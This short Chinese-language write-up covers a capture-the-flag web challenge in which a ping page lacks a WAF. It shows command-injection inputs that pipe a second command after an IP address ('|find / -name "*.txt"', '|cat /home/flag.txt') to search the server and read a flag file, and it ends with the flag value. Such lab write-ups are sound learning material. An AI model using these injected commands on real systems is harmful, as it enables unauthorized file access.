题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
首先去了解一下waf是个啥——
Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。
按我现有的知识储备量,先ping一个本地试试,发现可以ping通(如下图)
ping 127.0.0.1
可以ping通的话,再试试搜索一下flag字段看看有没有:
127.0.0.1 |find / -name "*.txt"
找到flag.txt后,输入一下代码来查看flag.txt中的内容
127.0.0.1|cat /home/flag.txt
成功拿到flag: cyberpeace{aa82ad143f24e6fc813e6a8823793325}